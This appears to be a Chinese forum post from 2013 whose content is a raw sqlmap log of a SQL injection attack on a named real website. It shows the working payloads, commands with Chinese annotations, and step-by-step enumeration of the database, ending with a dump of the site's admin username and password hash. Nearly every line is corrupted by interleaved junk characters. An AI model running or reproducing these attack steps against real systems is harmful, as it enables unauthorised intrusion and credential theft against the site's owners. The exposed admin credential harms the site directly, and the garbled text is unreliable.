D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* a, O. z+ g. @) E# X6 c+ v% o9 Ams "Mysql" --current-user /* 注解:获取当前用户名称( a* D1 u0 _. L9 q8 B) j) R% e& S
sqlmap/0.9 - automatic SQL injection and database takeover tool* [9 M# K4 Z. v, n% n
http://sqlmap.sourceforge.net starting at: 16:53:54
; i/ V2 m }0 W. i" g[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
' \7 I, _+ m' t3 O" S n r; z session file3 L8 w$ e" X$ g5 K8 U, I: d* {
[16:53:54] [INFO] resuming injection data from session file
0 p, s% b( H: `+ i8 }- F2 R# K& ]7 P[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# D" t0 x/ ~' y+ q
[16:53:54] [INFO] testing connection to the target url
# ? z6 A- F, ~! T1 Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque- y2 u+ A( k2 a* b
sts:7 N$ x6 X2 L D6 A# h z
---
( C, i# T' G2 h4 N2 b4 XPlace: GET7 E$ R' h0 J# F
Parameter: id
/ D* ?( ~3 Y3 ? e Type: boolean-based blind2 h$ B* _& w! l3 P' L9 n9 l. F& R
Title: AND boolean-based blind - WHERE or HAVING clause
1 B4 s# z$ H \1 J- I Payload: id=276 AND 799=7996 I7 ?2 v$ }0 J6 @: z
Type: error-based
. ^( |% G1 r) { h1 \6 h$ } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( b% D# W+ a) |; m, z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. N9 F- n$ R8 Y4 z& H$ ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
v7 |1 y' K* m" P& r6 b5 k( W2 Y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ |) f# c- c* u Type: UNION query; I4 z, k1 Q: m: G3 `
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 W6 }' j6 n8 u/ ]: P0 \ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: B+ g& h9 J6 X3 h8 }: q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) v0 a8 n! r, }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; T) \9 p! w$ _& u
Type: AND/OR time-based blind" x# o+ a6 i/ H( r& b
Title: MySQL > 5.0.11 AND time-based blind
8 L2 _) o! a, e- l' U8 m Payload: id=276 AND SLEEP(5)' c3 } C: O/ w( a7 O6 Y1 V, i
---1 F' ?, d4 b K1 V' l
[16:53:55] [INFO] the back-end DBMS is MySQL5 z- p4 U1 \. u0 I. O
web server operating system: Windows
4 i. ~/ s `& [) Tweb application technology: Apache 2.2.11, PHP 5.3.0
) g# | @5 ]/ P3 @/ k+ Tback-end DBMS: MySQL 5.0+ V; Y. z& T. E& J7 f- s5 T
[16:53:55] [INFO] fetching current user7 _6 U& Z K4 L$ }* i. d5 E- V
current user: 'root@localhost' 6 w' j& x! ^% b: L, X7 A4 ]* Y9 \1 c
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. s' s8 w+ p) g( @tput\www.wepost.com.hk' shutting down at: 16:53:58, |& }, W* {8 l% k" b5 U3 }
) _7 S. {$ A) X1 n. B6 V- T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% a# [1 v; e i7 l+ P. ams "Mysql" --current-db /*当前数据库
3 L* f* S$ j5 i) C/ M7 w3 } sqlmap/0.9 - automatic SQL injection and database takeover tool5 o# {4 A- e; i7 y
http://sqlmap.sourceforge.net starting at: 16:54:16+ G! P' M( D9 J9 W6 z
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ o, U+ k$ F4 ]
session file: @. q2 Z# h2 M0 y6 |0 I
[16:54:16] [INFO] resuming injection data from session file4 H" f0 O' l6 }7 R; q& E8 {$ w
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) t4 h, _4 c* Y! J
[16:54:16] [INFO] testing connection to the target url+ T0 J, N, B; O9 O" m9 w; m
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 d: n5 Z& R8 V7 P* jsts:. b! S# R+ A2 |+ a1 n/ f
---
2 F" @: j& P' Y4 F: R5 X7 fPlace: GET3 }. e5 \& K6 t, V, W3 M
Parameter: id
$ X. g2 m! _+ X Q8 D$ p Type: boolean-based blind
+ D0 j2 P: ]- m) G/ |9 }: ` Title: AND boolean-based blind - WHERE or HAVING clause0 H" H/ k& q& p/ b6 D
Payload: id=276 AND 799=7997 Q! D: J' b$ B( p
Type: error-based
5 T3 y% `% f3 ~ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, d# v3 ]) t- H! R" h$ \
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 \0 c+ Q% G; m- s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 `$ Q: d# U: v5 `& a
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- D; t+ `. Y; P) W+ z
Type: UNION query& d/ Q7 u' ]) z+ l4 ~
Title: MySQL UNION query (NULL) - 1 to 10 columns$ Z- x9 {+ ]% R* N! T" U) o* v; G
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: c% B' w8 S/ I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 G7 X6 [5 `5 g5 @
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 D! w* T g! v5 D) J! Y
Type: AND/OR time-based blind) X4 d; ? T; Y( x$ u M" b
Title: MySQL > 5.0.11 AND time-based blind' @ ?3 w; y, ]' j$ e% g
Payload: id=276 AND SLEEP(5)2 V5 r; o+ |5 g, h
---: i# t0 m! `+ U
[16:54:17] [INFO] the back-end DBMS is MySQL0 D3 p$ f" f$ M* {
web server operating system: Windows
: w# E# U- @' I+ U+ Q8 tweb application technology: Apache 2.2.11, PHP 5.3.0* }7 r" w! S5 }5 c8 H
back-end DBMS: MySQL 5.03 H4 ~: P/ I" u, W/ _, w- C) h
[16:54:17] [INFO] fetching current database
! N2 l; g/ r7 @ Dcurrent database: 'wepost'$ I) G+ f% z- G4 @2 M) O1 Z
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
! K, x% J; x4 P/ Vtput\www.wepost.com.hk' shutting down at: 16:54:18
/ I' G& N" x1 [, }8 A# A. m% hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! u& ^5 H0 g9 p9 J$ Wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
0 i& X. ]0 j' y' F) ^8 G6 s sqlmap/0.9 - automatic SQL injection and database takeover tool
! S6 x% R0 y# j, O7 p% r http://sqlmap.sourceforge.net starting at: 16:55:25
1 m( v0 U5 `1 g9 U- V, S8 W[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as& S: x0 C3 Z0 a7 L1 ?
session file& Q9 u- ]. b$ p, i0 H- |
[16:55:25] [INFO] resuming injection data from session file' {8 w0 N$ @1 {: l; H* F$ V
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file W1 g0 ~ h# y9 c5 X
[16:55:25] [INFO] testing connection to the target url/ ^) j0 R9 k! v% d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
e1 f: w, e" X) ists:
0 E: G4 g* p. b) R1 D: @---
$ f; l7 ]# }. K% y6 c3 sPlace: GET
+ U/ l7 R9 n, |. nParameter: id* Z. w7 `; `% B
Type: boolean-based blind. j" Z. z# x0 b. i
Title: AND boolean-based blind - WHERE or HAVING clause) T5 O. E) h9 j {9 q' S( [
Payload: id=276 AND 799=799
+ s1 O3 @% O. {( [ Type: error-based/ Z: J7 B# M, D! C2 c2 i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 d' g! w% n% D) G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 e1 P' F2 G' n& \2 y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 e: s+ @( I! B8 R u/ e/ @
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 Y0 w: C5 a% I% E" {) D% J4 I
Type: UNION query/ ]4 A& w& _4 [8 [/ }
Title: MySQL UNION query (NULL) - 1 to 10 columns
, s3 f7 }% K% J7 E3 K% m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 A0 s6 O( Y, c8 V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ w' f/ j* L' _9 qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% ~1 U) M- j$ v: h$ ?1 P
Type: AND/OR time-based blind
% ?6 D9 X+ o, N1 T& w+ T9 S2 _ Title: MySQL > 5.0.11 AND time-based blind
0 }0 i0 X+ ~5 O Payload: id=276 AND SLEEP(5)
! d$ h; e( h) T5 V! d---
3 w) i- U+ z2 z; |9 K, i; R[16:55:26] [INFO] the back-end DBMS is MySQL
6 R6 h3 X1 o) B; Hweb server operating system: Windows" s3 e9 J, b( F: ~
web application technology: Apache 2.2.11, PHP 5.3.05 {4 q, J& y0 ]( f6 m! l& R" m
back-end DBMS: MySQL 5.0) S3 j( W/ E# `( j# r7 I& k
[16:55:26] [INFO] fetching tables for database 'wepost'8 @& r! ^8 [) T9 v; a& r
[16:55:27] [INFO] the SQL query used returns 6 entries
$ Q& R/ g5 i+ ~Database: wepost: i/ l* o/ D% g1 x- y/ S8 F' D
[6 tables]& X8 u2 v8 A6 ]' M$ A
+-------------+9 H3 u; Z2 `; L; d. Y
| admin |
0 z* I: J2 h- D' H| article |) b" ?+ b. Q" X" K0 a0 E* F: y
| contributor |2 E* y- \' t4 Z5 j; G! A" Y
| idea |
+ L4 H& r( S, X$ W| image |
2 c# K# x3 A v: v* F7 w/ ^| issue |& O5 Z5 Z/ X k! O( q
+-------------+
3 M5 X6 Z1 V4 R* O[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou- O: P! [$ ?- q7 @( ?) w
tput\www.wepost.com.hk' shutting down at: 16:55:33
8 A# b' p" K( U4 J; v1 C! T. ^
3 v( k, P! T) w4 rD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, ~) m$ A# j% C* ?0 F4 K, Pms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名& B( H- H, @ ^+ x: W- R2 R
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 f1 G# c5 }" w$ L) j2 g" a- p) I http://sqlmap.sourceforge.net starting at: 16:56:06
) ], u! K @5 i# t, b2 Z3 Psqlmap identified the following injection points with a total of 0 HTTP(s) reque5 z% V0 Y P( P3 m$ w Q5 I
sts:1 B |5 e+ C1 x- c4 T) @
---
" p) O$ L! U+ g0 N% C6 Q& |: L K3 [Place: GET6 Q0 A$ V8 I4 F7 X+ B/ v5 r' Y
Parameter: id6 K3 p0 H4 E b
Type: boolean-based blind
! {/ Y: r& e/ n$ Q& g Title: AND boolean-based blind - WHERE or HAVING clause
5 o$ A. k$ h V# { Payload: id=276 AND 799=799+ H! r# j2 q& q3 g% q5 a+ T
Type: error-based
4 E( d: v4 H& s( Q- v0 p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 i4 ~! _3 Z3 N5 [* [3 T/ Y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- p! Z9 M4 z A, ]+ e, v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) M1 r. s: N5 h4 R),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): O- m* r7 X* b3 i0 l( L
Type: UNION query
+ T6 R, u! J% K/ W2 D Title: MySQL UNION query (NULL) - 1 to 10 columns+ F. w* q2 {4 D/ ]* C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 O9 o' @; \: a9 |7 D# _0 m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, G. U& w# x9 e% W K8 ?- }7 a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- a* |' L' o J7 W
Type: AND/OR time-based blind
% e2 N" x, k+ C* [; j4 R0 ^' ? Title: MySQL > 5.0.11 AND time-based blind+ }2 L% \8 r5 l0 p8 o" J. `2 y2 h
Payload: id=276 AND SLEEP(5)
% }7 N% w; A9 m- f---
; s( B9 w" I$ G7 S) L! N1 ^, P! |web server operating system: Windows! x7 v( p" P" Z3 ]8 A2 e
web application technology: Apache 2.2.11, PHP 5.3.0
; c$ _) U+ d5 n( G2 _( Yback-end DBMS: MySQL 5.0
; f, s! K# M% O' o[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
0 o b1 b' u" y1 _: w* Bssion': wepost, wepost) X/ a; P0 Z4 |) s& f( ^
Database: wepost
9 A, g6 m) V' J- m& GTable: admin: Q9 j7 W4 e5 n# J2 g4 a
[4 columns]) B$ ~' H2 A! R8 r) `3 {
+----------+-------------+
2 O; h: C9 |+ I% {) {! m| Column | Type |6 V- A/ h9 W3 f% y+ t
+----------+-------------+. M; m7 b+ v' v+ B
| id | int(11) |! Q" ?$ I( c3 f" X
| password | varchar(32) |; o( E* J& ~1 ?- @
| type | varchar(10) | i! W ~* N- r6 t( e. B7 ?6 h8 q6 N
| userid | varchar(20) |7 B! ^: C% s# j
+----------+-------------+
( }& u2 ^# k8 S$ _% W% V) d. O: Q shutting down at: 16:56:19
' Q3 b7 d4 }+ J+ @; Q4 ^) V1 Y; h% W: t: }% [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- Z2 E: v; O0 |4 G' s8 jms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
* I: A/ w) q" C5 z V7 [- W% K sqlmap/0.9 - automatic SQL injection and database takeover tool
, _ ?7 t9 `! I' q4 f6 R http://sqlmap.sourceforge.net starting at: 16:57:14! T/ [8 R7 ]( X9 D9 S$ r' ?9 @
sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 O2 |: r# O2 L% G0 t6 A' m
sts:
4 h2 v5 m7 p4 q. ]1 f( A9 T; e0 u w---5 B. j A- \1 {8 Z* W* t+ G
Place: GET
`! S( a8 x: X& p7 rParameter: id" b' e @2 K* Z6 W; M; T
Type: boolean-based blind: C6 |2 _& ^! l& {5 V
Title: AND boolean-based blind - WHERE or HAVING clause8 ]/ z- R* f, G* }' q; ^2 X# R
Payload: id=276 AND 799=799$ U F9 ~9 o. P' k4 Y4 [2 N
Type: error-based
7 j" S" n2 e. j& g( o! q% v! ~; Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 Q ?0 S# x2 b' M8 p( }5 l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- C! r$ U j2 c+ J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 H+ b m8 J. O, i# }% G5 O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: K# F1 S, z4 ]4 O Type: UNION query* [* n- d7 N' Q, Q$ [
Title: MySQL UNION query (NULL) - 1 to 10 columns1 Q0 {7 ^& p0 v. O3 ~ i L5 D
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ o0 Q) m' w6 e, F: X3 e
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- k) E$ H8 @0 q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ V7 R2 E! Q# L' ^" C$ J$ X. F
Type: AND/OR time-based blind. q; |4 r9 r; Q
Title: MySQL > 5.0.11 AND time-based blind
$ V6 _7 q8 E' D) b3 n& ~7 X Payload: id=276 AND SLEEP(5); p, s7 ^" o+ J! {5 J& e' ^
---
, b# e4 o/ R" r4 ^$ {web server operating system: Windows0 g) L" K' f( Z7 i+ F$ K
web application technology: Apache 2.2.11, PHP 5.3.0& Y8 \# R$ m8 X& V3 h/ t' C0 O
back-end DBMS: MySQL 5.0
# R% r. C5 j+ zrecognized possible password hash values. do you want to use dictionary attack o7 A$ z# N( c* R+ u I5 f1 H e0 _
n retrieved table items? [Y/n/q] y" H* e/ O$ ^& U# ?
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]* p0 p( M, h2 O4 A/ j- |8 |- c6 x
do you want to use common password suffixes? (slow!) [y/N] y/ @4 t" _; b. }/ U( L
Database: wepost1 X) _, V, A" `& I4 T3 N
Table: admin
9 m; B* X/ @$ s+ L7 l( N[1 entry]; C+ U' g% `4 o) a7 ^3 C
+----------------------------------+------------+
+ W* d# y& T$ b D2 R. `3 M) O, p| password | userid |
, L/ } N5 t2 w! z0 u6 f+----------------------------------+------------+- Y4 f0 U y! i0 E) \+ N
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
- C9 I z0 X; |- ~4 t" @+----------------------------------+------------+
$ {+ f9 f% @1 z9 [1 D0 k ?! j3 R8 e shutting down at: 16:58:14
9 D' F- E7 T* z: e8 H# c6 v& `
4 U; {* D/ J, z$ o" V+ GD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对